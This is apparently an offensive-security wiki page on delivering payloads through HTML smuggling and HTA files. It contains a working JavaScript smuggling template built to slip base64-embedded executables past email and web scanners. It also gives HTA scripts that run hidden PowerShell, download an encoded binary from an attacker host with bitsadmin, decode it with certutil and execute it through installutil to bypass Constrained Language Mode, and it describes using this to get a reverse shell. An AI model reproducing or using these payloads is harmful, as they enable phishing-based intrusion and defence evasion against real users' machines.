HTML Smuggling & HTA Files

- HTML Smuggling

If you send a phishing email with a download link, the HTML may look something like:

<a href="http://attacker.com/file.doc">Download Me</a>

Email and web scanners are capable of parsing these out and taking some action. They may be removed entirely, or the URL content fetched and scanned by an AV sandbox. HTML smuggling allows us to get around this by embedding the payload into the HTML source code and using JavaScript to construct URLs by the browser at runtime.

First we create the encoded contetn:

echo -en "This is a smuggled file" | base64

or

cat malicious.exe | base64 -w 0; echo

Then the HTML code:

! Note that Google Chrome supports window.URL.createObjectURL, window.navigator.msSaveBlob method make the technique work with Microsoft Edge as well.

<html>
    <head>
        <title>HTML Smuggling</title>
    </head>
    <body>
        <p>This is all the user will see...</p>

        <script>
        function convertFromBase64(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            var bytes = new Uint8Array( len );
            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
            return bytes.buffer;
        }

        var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
        var data = convertFromBase64(file);
        var blob = new Blob([data], {type: 'octet/stream'});
        var fileName = 'test.txt';

        if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
        else {
            var a = document.createElement('a');
            document.body.appendChild(a);
            a.style = 'display: none';
            var url = window.URL.createObjectURL(blob);
            a.href = url;
            a.download = fileName;
            a.click();
            window.URL.revokeObjectURL(url);
        }
        </script>
    </body>
</html>

- HTA Files

HTA-based attacks offer simplicity in development and obfuscation, with flexibility for evasion. They bypass SmartScreen but face challenges such as heightened detection efforts, reliance on user interaction, and the detectability of mshta.exe as the parent process.

hta file that performs a simple ping:

<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 2 192.168.X.Y");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

This is usefull because we can create a shortcut file executed with a built-in application in windows. To create the shortcut file, we’ll right-click the desktop on the Windows machine and navigate to New -> Shortcut. In the new window, we’ll enter the MSHTA executable path (C:\Windows\System32\mshta.exe) followed by the URL of the .hta file on our Kali machine. Example: C:\Windows\System32\mshta.exe http://192.168.119.120/test.hta

Then we transfer this shortcut to our Kali machine and then we can create a Jscript code generated with DotNetToJscript, embed it in the hta file and obtain a reverse shell by only sending the victim this shortcut file.

We can also combine this shortcut with HTML Smuggling.

If we want for example, a hta file that bypass Powershell CLM and loads a ps revese shell, we can use the following code (The binary should be fisrt certutil encoded and must follow the structure of InstallUtil C# code to bypass PCLM):

<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden bitsadmin /Transfer newjob3 http://192.168.49.173/enc3.txt c:\\windows\\temp\\enc3.txt;certutil -decode c:\\windows\\temp\\enc3.txt c:\\windows\\temp\\bypass.exe;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\windows\\temp\\bypass.exe")
//var res = shell.Run("bitsadmin /Transfer newjob2 http://192.168.49.173/enc2.txt c:\\windows\\temp\\enc1.txt");
//var res1 = shell.Run("timeout 10 && certutil -decode c:\\windows\\temp\\enc.txt c:\\windows\\temp\\bypass.exe");
//var res2 = shell.Run("timeout 12 && C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\windows\\temp\\bypass.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
PreviousVBA Macros & RTINextJS Files

Last updated